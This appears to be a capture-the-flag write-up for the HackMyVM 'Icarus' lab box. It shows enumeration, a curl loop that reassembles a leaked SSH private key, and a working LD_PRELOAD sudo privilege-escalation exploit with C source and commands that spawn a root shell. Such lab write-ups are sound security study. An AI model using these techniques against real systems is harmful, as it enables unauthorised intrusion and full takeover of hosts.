HMV Icarus Attack Chain
2026-03-23
2026-03-26190 Words
Scope
- Name: Icarus
- Difficulty: (2/10)
- OS: Linux
- IP: icarus.hmv(192.168.56.103)
Foothold
I discover some regular endpoints with enumeration.
❯ feroxbuster -u http://icarus.hmv/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,js ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.13.1 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://icarus.hmv/ 🚩 In-Scope Url │ icarus.hmv 🚀 Threads │ 50 📖 Wordlist │ /usr/share/wordlists/dirb/common.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.13.1 💉 Config File │ /home/curtain/.config/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [php, html, txt, js] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 404 GET 7l 12w 169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 200 GET 1825l 1824w 9641c http://icarus.hmv/a 200 GET 1l 5w 21c http://icarus.hmv/check.php 200 GET 12l 31w 407c http://icarus.hmv/ 200 GET 12l 31w 407c http://icarus.hmv/index.php 302 GET 0l 0w 0c http://icarus.hmv/login.php => index.php 200 GET 1l 1w 1c http://icarus.hmv/xdb 200 GET 1l 1w 1c http://icarus.hmv/xls 200 GET 1l 1w 1c http://icarus.hmv/xml 200 GET 1l 1w 1c http://icarus.hmv/xsl 200 GET 1l 1w 1c http://icarus.hmv/xxx 200 GET 1l 1w 1c http://icarus.hmv/xyz [####################] - 2s 23075/23075 0s found:11 errors:1 [####################] - 1s 23070/23070 24543/s http://icarus.hmv/
The /a endpoint include all valid endpoints. More interestingly, these endpoints all follow an
alphabetical order.
❯ head -20 a.txt a xaa xab xac xad xae xaf xag xah xai xaj xak xal xam xan xao xap xaq xar
And they seems to leak useful secrets.
❯ curl http://icarus.hmv/xaa -% ❯ curl http://icarus.hmv/xab -% ❯ curl http://icarus.hmv/xac -% ❯ curl http://icarus.hmv/xad -% ❯ curl http://icarus.hmv/xae -% ❯ curl http://icarus.hmv/xaf B% ❯ curl http://icarus.hmv/xag E% ❯ curl http://icarus.hmv/xah G% ❯ curl http://icarus.hmv/xai I% ❯ curl http://icarus.hmv/xaj N% # -----BEGIN
Then I use following simple script to dump them out.
for d in $(cat a.txt);do curl http://icarus.hmv/$d; done
Yeah, it is SSH private key! Then I try user icarus immediately and success.
Privilege Escalation
id information
icarus@icarus:~$ id uid=1000(icarus) gid=1000(icarus) groups=1000(icarus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
SUID files
icarus@icarus:~$ find / -mount -perm -u=s 2>/dev/null /usr/bin/passwd /usr/bin/su /usr/bin/mount /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/chfn /usr/bin/chsh /usr/bin/umount /usr/bin/sudo /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign
Network Information
icarus@icarus:~$ ss -tnlup Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:80 0.0.0.0:* tcp LISTEN 0 128 [::]:22 [::]:* tcp LISTEN 0 128 [::]:80 [::]:*
sudo rules
icarus@icarus:~$ sudo -l
Matching Defaults entries for icarus on icarus:
env_reset, mail_badpass, env_keep+=LD_PRELOAD,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User icarus may run the following commands on icarus:
(ALL : ALL) NOPASSWD: /usr/bin/id
I could set LD_PRELOAD with sudo! This means that I could inject custom shared library to any
executable that sudo rules configured.
#include<stdio.h> #include<sys/types.h> #include<stdlib.h> #include<unistd.h> void _init() { unsetenv("LD_PRELOAD"); setuid(0); setgid(0); system("/bin/bash"); }
Then compile it to shared library with gcc -shared -nostartfiles -o exp.so exp.c.
sudo LD_PRELOAD=./exp.so /usr/bin/id